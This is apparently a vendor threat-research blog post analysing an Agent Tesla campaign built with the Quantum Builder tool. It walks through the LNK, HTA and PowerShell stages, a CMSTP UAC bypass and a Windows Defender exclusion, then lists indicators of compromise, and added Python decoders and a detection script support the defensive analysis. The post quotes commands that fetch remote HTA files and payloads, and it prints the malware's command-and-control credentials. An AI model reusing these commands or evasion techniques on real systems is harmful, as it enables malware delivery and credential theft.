Zscaler ThreatLabz has observed a campaign that delivers Agent Tesla, a .NET based keylogger and remote access trojan (RAT) active since 2014, using a builder named “Quantum Builder” sold on the dark web. This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past.
Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut files. It has been linked to the Lazarus Group APT due to shared TTPs and source code overlaps, but we cannot confidently attribute this campaign to any specific threat actor. In this campaign, threat actors use Quantum Builder to generate malicious LNK, HTA, and PowerShell payloads which then deliver Agent Tesla on the targeted machines. The payloads generated by the builder employ sophisticated techniques such as:
- User Account Control (UAC) bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary, both to execute the final payload with administrative privileges and to add Windows Defender exclusions
- A multi-staged infection chain that combines several attack vectors involving LOLBins
- Execution of PowerShell scripts in memory in order to evade detection
- Execution of decoys in order to distract the victims post-infection
In this blog, we present an in-depth analysis of the infection chains delivering Agent Tesla and compare them with the payloads generated by Quantum Builder.
Key Features of this Attack:
- The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines, leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”.
- Quantum Builder is sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads that use sophisticated techniques to download and execute the final payload through a multi-staged attack chain.
- The in-memory PowerShell scripts decrypted by the Quantum Builder-generated HTA file perform a User Account Control (UAC) bypass via CMSTP in order to execute the final payload (Agent Tesla) with administrative rights. The same UAC bypass is also used to add Windows Defender exclusions on the endpoint.
- The chain uses Living Off the Land Binaries (LOLBins) to evade detection and camouflage the malicious activity.
- It incorporates techniques such as decoys, UAC prompts and in-memory PowerShell to execute the final payload. These techniques are regularly updated by the developers of Quantum Builder.
Infection Chain:
The novel infection chain commences with a spear phishing email carrying an LNK file bundled in a GZIP archive. Upon execution of the LNK file, the embedded PowerShell code spawns MSHTA, which in turn executes an HTA file hosted on a remote server.
The HTA file then decrypts a PowerShell loader script, which AES-decrypts and GZIP-decompresses a second PowerShell script. That decrypted script is the downloader PS script: it first downloads the Agent Tesla binary from a remote server and then executes it with administrative privileges by performing a UAC bypass using CMSTP.
Finally, the Agent Tesla is executed on the target machine with administrative privileges.
Fig 1. Infection Chain
Infection Chain - Technical Analysis:
As mentioned above, the infection chain starts with a spear phishing email with the subject: “New Order Confirmation - Guangdong Nanz Technology co. ltd.” GuangDong Nanz Technology is a Chinese manufacturing company and a leading supplier of lump and rock sugar from Guangdong, China.
Fig 2. Spear phishing Email with attached malicious .LNK File
The spear phishing email carries a GZIP archive as an attachment. The archive contains a malicious .LNK (Windows shortcut) file with a PDF icon that lures the victim into opening it, as shown in the screenshot above.
Once executed, the .LNK file runs obfuscated PowerShell code which first decodes two base64-encoded strings using FromBase64String() and then XOR-decrypts both decoded strings with a hard-coded single-byte XOR key, 0x77. The decrypted strings are then concatenated to form the following command: “IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/ordr[.]hta”
Fig 3. Obfuscated PowerShell Code executed via the .LNK File
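To reproduce the decoding step above for analysis, the following added example (not code from the post or from the builder) mirrors the stub's FromBase64String() plus single-byte XOR, and also brute-forces the key when it is not known. The encoded blobs and the URL host are constructed placeholders, not the campaign's real strings.

```python
import base64

# Constructed sample, not the campaign's real strings: the two halves of the
# command are XOR-encoded with the single-byte key 0x77 and then base64-encoded,
# mirroring what the .LNK stub hands to FromBase64String(). The URL is a placeholder.
XOR_KEY = 0x77
COMMAND_PARTS = ["IEX mshta ", "https://files.invalid/ordr.hta"]
MARKERS = ("mshta", "http", "iex")  # tokens the deobfuscated command should contain

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def build_sample(parts=COMMAND_PARTS, key=XOR_KEY):
    """Encode plaintext parts the way the stub expects them (demo input only)."""
    return [base64.b64encode(xor_bytes(p.encode("ascii"), key)).decode("ascii") for p in parts]

def decode_with_key(blobs, key=XOR_KEY) -> str:
    """Mirror of the stub: FromBase64String() on each blob, XOR every byte, join."""
    return "".join(xor_bytes(base64.b64decode(b), key).decode("latin-1") for b in blobs)

def recover_single_byte_key(blobs):
    """Try all 256 keys; keep those whose output is printable ASCII and rank them
    by how many marker tokens the output contains. Returns (key, command), or
    None when no key produces printable text that contains a marker."""
    best = None
    for key in range(256):
        text = decode_with_key(blobs, key)
        if not all(32 <= ord(c) < 127 for c in text):
            continue
        score = sum(text.lower().count(m) for m in MARKERS)
        if best is None or score > best[0]:
            best = (score, key, text)
    return None if best is None or best[0] == 0 else (best[1], best[2])

if __name__ == "__main__":
    sample = build_sample()
    print("known key :", decode_with_key(sample))
    print("recovered :", recover_single_byte_key(sample))
```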
Invoke-Expression then runs that command, which spawns the mshta.exe utility to execute an HTML Application (.HTA) file hosted on a remote server; the file's URL is passed as the argument to the mshta binary. MSHTA allows the threat actors to proxy the execution of arbitrary code through a trusted utility, as shown in the screenshot below.
Fig 4. Executes a HTA File hosted on a Remote Server via MSHTA
The HTML Application (HTA) file executed by MSHTA via the .LNK file contains around 1,000 lines of junk VBScript functions; only a single function performs the malicious activity. This main malicious function first initialises an encrypted array and then passes it to a decryption function, as shown in the figure below.
Fig 5. HTA File - Main Function
Next, the decryption routine checks that the input is an array (VarType() returns 8204) and then decrypts it by subtracting the hard-coded key 37166 from each element and converting the results into characters. The decrypted characters are concatenated to form a PowerShell script, as seen in the following screenshot.
Fig 6. HTA File - PS Script Decryption Routine
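The subtract-a-constant routine above is the same one the post later reports with keys 79114 (downloader URL), 63194 (PAYMENT.hta) and 58146 (second downloader), and the integer-to-character variant in PAYMENT.png.lnk is the key-0 case. The added example below (not the builder's or the campaign's code) reproduces the routine and recovers the key when it is unknown by picking the offset that turns the whole array into PowerShell-looking text; the sample script is constructed.

```python
# Added example (not the builder's or the campaign's code). The HTA routine on the
# page subtracts a hard-coded key from every element of an integer array and turns
# the results into characters. This reproduces that and, when the key is unknown,
# recovers it: only a narrow band of offsets keeps every element printable, and the
# right one is the offset whose output contains the most PowerShell tokens.
SAMPLE_SCRIPT = 'function Invoke-Demo { $u = "http://files.invalid/x"; iex ($u -join "") }'  # constructed
PS_TOKENS = ("$", "function", "iex", "invoke", "-join", "[char]", "(", "=", "http")

def encode_array(text: str, key: int) -> list:
    """Build the array the way the builder would: ord(char) + key (demo input only)."""
    return [ord(c) + key for c in text]

def decode_array(values, key: int) -> str:
    """The HTA routine: subtract the key from each value and convert to a character."""
    return "".join(chr(v - key) for v in values)

def _printable(ch: str) -> bool:
    return ch in "\t\r\n" or 32 <= ord(ch) <= 126

def candidate_keys(values):
    """Yield every key for which all decoded characters are printable ASCII.
    chr(v - key) must stay within 9..126, so the key is bounded by the array's extremes."""
    lo, hi = min(values), max(values)
    for key in range(hi - 126, lo - 9 + 1):
        if all(_printable(chr(v - key)) for v in values):
            yield key

def recover_key(values):
    """Return the candidate key whose output contains the most PowerShell tokens,
    or None when no offset yields printable text containing any token."""
    scored = []
    for key in candidate_keys(values):
        text = decode_array(values, key).lower()
        scored.append((sum(text.count(t) for t in PS_TOKENS), key))
    if not scored:
        return None
    score, key = max(scored)
    return key if score > 0 else None

if __name__ == "__main__":
    arr = encode_array(SAMPLE_SCRIPT, 37166)
    k = recover_key(arr)
    print("recovered key:", k)
    print(decode_array(arr, k))
```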
A similar decryption routine, again taking an encrypted array as input, is used to decrypt the string “Wscript.Shell”. Once both the PowerShell script and the shell object string are decrypted, the malicious function creates a WScript.Shell object via CreateObject() and executes the decrypted PowerShell script via its Run method.
Fig 7. HTA File - PowerShell Script Execution
The decrypted loader PowerShell script is then executed in a hidden window with the execution policy set to Unrestricted. Its main aim is to decrypt a second, downloader PowerShell script: it first performs AES decryption against an encrypted blob of data using a base64-encoded key, and then GZIP-decompresses the result, which yields the new PowerShell script. That script is executed in memory via Invoke-Expression. The complete code snippet, annotated with pointers, can be seen in the screenshot below.
Fig 8. Execution of New PowerShell Script - AES Decrypted and GZIP Decompressed
The AES-decrypted and GZIP-decompressed downloader PowerShell script executed via IEX is the key script in the chain and performs the following malicious actions:
- Downloads the final Agent Tesla payload from the remote server
- Performs a CMSTP User Account Control (UAC) bypass:
  - to execute Agent Tesla with administrative privileges
  - to exclude the AppData directory (which contains the Agent Tesla binary) from Windows Defender
- Hides the Agent Tesla binary by manipulating its file attributes
The routine first builds the drop path for the Agent Tesla binary by reading the AppData path from the environment variable and appending the hard-coded file name “MuUQDuaFNoGmHQE.exe”.
It then checks whether that path already exists. If it does, the PS script runs the CMSTP UAC bypass, which executes the binary (Agent Tesla) with administrative privileges. If not, an encrypted array is passed as an argument to the decryption routine, as seen in the screenshot below.
Fig 9. Decrypted PowerShell Script
The decryption routine decrypts the array by subtracting the hard-coded key 79114 from each element. In this case the decrypted string is the following download URL, which hosts the final Agent Tesla payload: https[:]//filebin.net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
Fig 10. Decryption of Downloader URL
The decrypted download URL is then passed to a downloader function, which first decrypts the Net.WebClient string and initialises a new WebClient object. It then calls WebClient.DownloadData() with the filebin[.]net URL as the argument, which downloads the resource as a byte array, as seen in the following screenshot.
Fig 11. Downloads the Agent Tesla from Remote Server
The downloaded Agent Tesla binary is then written to disk via the WriteAllBytes() function at the following path: “C:\Users\<username>\AppData\Roaming\MuUQDuaFNoGmHQE.exe”
Fig 12. Writes the downloaded Agent Tesla binary in AppData Directory
Next, the PowerShell script performs the CMSTP User Account Control bypass in order to execute the Agent Tesla binary with administrative privileges. CMSTP is the Microsoft Connection Manager Profile Installer, a Microsoft-signed binary used for installing or removing Connection Manager service profiles. CMSTP accepts an INF (Installation Information) file as the argument for installing the service profile.
In this case, the threat actors abuse CMSTP to bypass UAC with the help of a malicious INF file containing the commands to be executed. When cmstp.exe processes the INF file, it instantiates the COM interface CMLUAUTIL in the background. That interface is auto-elevated, so the commands in the INF file run with elevated privileges.
In our case, the path of the Agent Tesla binary is passed as an argument to the CMSTP UAC bypass function in the PS script. The function first decodes a large block of base64-encoded data, into which the path of the binary is concatenated, as portrayed in the screenshot below.
Fig 13. CMSTP UAC Bypass Function
The base64-decoded data is a PowerShell-based CMSTP UAC bypass PoC available on GitHub (link). The decoded PowerShell script is then base64-encoded again and executed as an encoded command (-Encoded) with a hidden window, as seen in the screenshot below.
Fig 14. Execution of CMSTP UAC Bypass PS Script
Upon execution, the PowerShell-based CMSTP UAC bypass PoC script writes a malicious INF file in the Temp directory; the $CommandToExecute variable in the PS script holds the path of the Agent Tesla binary. The INF file written to disk therefore contains the path of the Agent Tesla binary as the command to be executed with elevated privileges when cmstp.exe runs, as shown in the screenshot below.
Fig 15. Malicious INF File with command to be executed
Once the INF file is written to the Temp directory, the PowerShell script spawns a new process, “cmstp.exe”, with “/au $InfFileLocation” as the arguments, which then installs the malicious INF file, as shown below.
Fig 16. Execution of CMSTP.exe with the malicious INF File as the argument
While cmstp.exe is processing the INF file, the commands in the RunPreSetupCommandsSection parameter are executed with administrative privileges. To automate the process, the script sends an [ENTER] keystroke to the active window using the SendKeys.SendWait() function.
Fig 17. Sends [ENTER] keystroke to trigger the UAC Bypass
In our case, the RunPreSetupCommandsSection parameter in the malicious INF contains the path to the Agent Tesla binary residing in the AppData directory. Therefore, when cmstp.exe is spawned with the malicious INF as the argument, the COM interface CMLUAUTIL is auto-elevated and the malware is executed with administrative privileges, bypassing UAC as seen in the screenshot below.
Fig 18. Agent Tesla malware executed with Administrative privileges bypassing the UAC
Once Agent Tesla is executed with elevated privileges, it steals personal data from browsers and mail clients and, like older Agent Tesla variants, performs keylogging, form grabbing and clipboard hijacking. It communicates with the FTP-based CnC server “ftp[.]qurvegraphics[.]com” using the following configuration:
Configuration:
- Protocol: ftp
- Host: ftp[.]qurvegraphics[.]com
- Port: 21
- Username: eddx@qurvegraphics[.]com
- Password: C1WJFi]vTamX
FTP-based CnC communication:
Fig 19. FTP Based Agent Tesla CnC Communication
Furthermore, a similar CMSTP UAC bypass function is implemented in the PowerShell script to add a Windows Defender path exclusion for the AppData directory where the Agent Tesla binary resides. The only difference on the INF side is that the RunPreSetupCommandsSection parameter of the INF file contains the following command: “PowerShell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:AppData”, which is executed with administrator privileges via the cmstp.exe UAC bypass, as discussed earlier.
Fig 20. Window Defender Exclusion via CMSTP UAC Bypass
Finally, the PowerShell script hides the Agent Tesla binary by setting the hidden file attribute. This completes the infection chain used by the threat actors to deliver Agent Tesla on the victim machines.
Fig 21. Hides the Final Payload by manipulating the File Attributes
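Each stage of the chain above leaves a process-creation artifact (PowerShell launching mshta with a URL, a hidden encoded PowerShell child of mshta, cmstp.exe /au with an INF in Temp, Add-MpPreference -ExclusionPath, an executable running from AppData\Roaming). The added example below, which is not part of the post or of any Zscaler product, runs one predicate per stage over a set of constructed Sysmon-style events; the user name, INF name and URL host are placeholders.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events that mirror the chain in the
# post (explorer -> powershell -> mshta -> powershell -> cmstp -> elevated payload).
# User name, INF name and URL host are placeholders; nothing here is real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -c "IEX mshta https://files.invalid/ordr.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": PS,
     "cmdline": "mshta https://files.invalid/ordr.hta"},
    {"image": PS, "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -WindowStyle hidden -ExecutionPolicy Unrestricted -Encoded SQBFAFgA"},
    {"image": r"C:\Windows\System32\cmstp.exe", "parent": PS,
     "cmdline": r"cmstp.exe /au C:\Users\victim\AppData\Local\Temp\profile.inf"},
    {"image": PS,  # parent omitted: the elevated spawn goes through the COM interface
     "cmdline": r"PowerShell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile "
                r"-ExecutionPolicy Unrestricted Add-MpPreference -ExclusionPath C:\Users\victim\AppData\Roaming"},
    {"image": r"C:\Users\victim\AppData\Roaming\MuUQDuaFNoGmHQE.exe",
     "cmdline": r"C:\Users\victim\AppData\Roaming\MuUQDuaFNoGmHQE.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\victim\Documents\notes.txt"},  # benign control
]

def _exe(path: str) -> str:
    return ntpath.basename(path).lower()

def _has(pattern: str, text: str) -> bool:
    return re.search(pattern, text, re.I) is not None

# One predicate per stage of the chain; each is weak alone, strong in combination.
RULES = {
    "mshta_remote_hta": lambda e: _has(r"\bmshta(\.exe)?\b.*https?://", e["cmdline"]),
    "powershell_mshta_chain": lambda e: {_exe(e["image"]), _exe(e.get("parent", ""))}
        == {"powershell.exe", "mshta.exe"},
    "hidden_encoded_powershell": lambda e: _exe(e["image"]) == "powershell.exe"
        and _has(r"-w(indowstyle)?\s+hidden", e["cmdline"])
        and _has(r"(^|\s)-e(c|nc|ncoded|ncodedcommand)?\s", e["cmdline"]),
    "cmstp_au_inf_in_temp": lambda e: _exe(e["image"]) == "cmstp.exe"
        and _has(r"/au\s+\S*\\temp\\\S+\.inf", e["cmdline"]),
    "defender_exclusion_from_cli": lambda e: _has(r"add-mppreference\s.*-exclusionpath", e["cmdline"]),
    "exec_from_appdata_roaming": lambda e: _has(r"\\appdata\\roaming\\[^\\]+\.exe$", e["image"]),
}

def scan(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, pred in RULES.items() if pred(ev)]

def stages_seen(events) -> int:
    """Number of distinct chain stages observed; several together is the real signal."""
    return len({name for _, name in scan(events)})

if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule}")
    print("stages seen:", stages_seen(EVENTS))
```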
Attack Variations
We came across multiple samples using another variation of the infection chain to deliver Agent Tesla on the victim machine. In this variation, the initial .LNK file (PAYMENT.png.lnk) was bundled in a ZIP archive (PAYMENT.png.zip). The .LNK file is again tasked with executing an HTA file hosted on a remote server: it decodes the command “Iex mShta http://179[.]43[.]175[.]187/puao/PAYMENT.hta” by converting a list of integers into characters and stripping whitespace, and then leverages MSHTA to execute the HTA file from the remote URL, as shown in the screenshot below.
Fig 22. Execution of Remote HTA File via .LNK
The HTA file executed by MSHTA in this case is identical in structure to the one used in the previous infection chain: the encrypted array is passed to the decryption function, which subtracts the hard-coded key 63194 from each element and converts the results into characters to form the PowerShell script, which is then executed via the Run method.
Fig 23. HTA File decrypts the PowerShell Script
Apart from the Run() method, in some cases the HTA file uses the ShellExecute() method to run the decrypted PowerShell script with the “runas” verb, which attempts to elevate privileges by presenting a UAC prompt to the user.
Fig 24. UAC Prompt via ShellExecute() “RunAs”
The decrypted downloader PowerShell script in this case is also similar to the one analyzed previously, except that it omits the AES-decryption stage and the CMSTP UAC bypass component. In this variation, the downloader script first decrypts the download URL “179[.]43[.]175[.]187/puao/PAYMENTS[.]exe” using the same decryption function with the hard-coded key 58146, and then downloads the Agent Tesla payload from that URL via DownloadData() and writes it to the AppData directory. Once written, it executes the payload from the AppData path using Start-Process(); if the payload's extension is “.dll”, it uses rundll32.exe to load the DLL into memory instead.
Fig 25. Downloads and Executes Agent Tesla via the Decrypted PowerShell Script
In some cases we also came across in-memory decrypted PowerShell scripts that downloaded and opened a decoy file using the Invoke-Item function. This is done to distract the victim from the malicious activity, as shown in the screenshot below.
Fig 26. Decoy Execution
The final Agent Tesla payload in this case uses SMTP-based CnC communication with the following configuration:
- Protocol: SMTP
- Email Address: [email protected]
- Password: Sa4=3jj*E{#_
- SMTP Server: mail[.]thesharpening[.]com[.]au
Fig 27. SMTP based CnC Communication performed by Agent Tesla
‘Quantum’ Builder Analysis & Comparison:
From our analysis of the infection chain explained above, we were able to deduce that the LNK and HTA payloads and the in-memory PowerShell scripts were generated by a builder named “Quantum Builder”. Quantum Builder is a fully customizable builder capable of generating evasive LNK, HTA, and ISO payloads that incorporate advanced techniques such as UAC bypass and in-memory payloads to evade detection. The builder is sold with various pricing plans in the cybercrime marketplace and is updated regularly with new detection-evasion techniques.
Fig 28. Quantum Builder
We were able to get our hands on Quantum Builder, which allowed us to analyze the generated payloads and compare them with the in-the-wild (ITW) payloads used in the Agent Tesla campaign above. The analysis and comparison of the HTA and LNK builder modules follows.
Module 1 - HTA Builder
The HTA builder accepts the following inputs from the user in order to build the HTA payload, as shown in the screenshot below.
Fig 29. Quantum Builder - HTA Builder
Next, the input values are passed to the HTA builder function, where they are concatenated and arranged to construct the HTA file, as can be seen in the screenshot below.
Fig 30. Quantum Builder - HTA Generation (Testing.hta)
If we compare the ShellExecute function in the “Testing.hta” code shown above with the ShellExecute function of the in-the-wild HTA file shown below (analyzed previously, where it executes the decrypted PS script and triggers the UAC prompt), the similarities verify that the in-the-wild payloads were generated by Quantum Builder.
Fig 31. In-The-Wild HTA File
The generated HTA and in-memory PowerShell files vary slightly depending on the options selected while building the payload. Per our analysis, almost all of them closely match the files seen in the wild and analyzed in the infection chain section, confirming that those files were generated by Quantum Builder.
Module 2 - LNK Builder
The LNK builder module accepts the following values, as seen in the screenshot below, in order to generate a malicious LNK file.
Fig 32. Quantum Builder - LNK Builder
The input values are then arranged in the required format: some strings are XOR-encrypted and laid out in a specific order, and the LNK (shortcut) file is then created using the CreateShortcut() function with the path where the LNK file is to be saved. In the screenshot we can see the parameters of the shortcut file, such as Description, IconLocation, Target Path, Arguments and WindowStyle.
Fig 33. Quantum Builder - LNK Builder
Comparing the PowerShell code in the screenshot above, which uses “ -join | % { [char] ($_ -bxor”, “[convert]::FromBase64String” and “sal”, with the PowerShell code in the .LNK file from the Agent Tesla campaign shown below, we see that the arguments are identical, proving that the campaign's LNK file was generated by Quantum Builder.
Fig 34. Agent Tesla Campaign LNK PowerShell code snippet
The builder can also generate ISO payloads bundled with the malware to be delivered, as shown in the screenshot below.
Fig 35. ISO Builder
The Quantum Builder has been used by threat actors in multiple campaigns in the wild to deliver various malware families including:
- RedLine Stealer
- IcedID
- GuLoader
- RemcosRAT and AsyncRAT
Thus, we can conclude that threat actors are leveraging “Quantum Builder” to generate LNK, HTA and ISO payloads equipped with advanced techniques (which are updated regularly) to deliver various malware families to target machines.
Zscaler Sandbox Coverage:
Fig 36. The Zscaler Cloud Sandbox successfully detected the Downloader.
Conclusion:
Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads for campaigns against various organizations. The builder incorporates sophisticated techniques to evade detection, and these techniques are updated regularly by its developers. The Zscaler ThreatLabz team will continue to monitor these attacks to help keep our customers safe.
IoCs:
LNK hash:
HTA URL:
filebin[.]net/njqyvfot61w0tu9a/ordr[.]hta
filebin[.]net/yiob7vjw7pqow03r/RFQ_270622[.]hta
179[.]43[.]175[.]187/puao/PAYMENT[.]hta
179[.]43[.]175[.]187/puao/PO-M6888722[.]hta
Agent Tesla Download URL:
filebin[.]net/e730ez2etlh3weer/MuUQDuaFNoGmHQE[.]exe
179[.]43[.]175[.]187/puao/PAYMENTS[.]exe
179[.]43[.]175[.]187/puao/PO-M6888757[.]exe
Agent Tesla hashes:
Agent Tesla CnC:
mail[.]thesharpening[.]com[.]au
ftp[.]qurvegraphics[.]com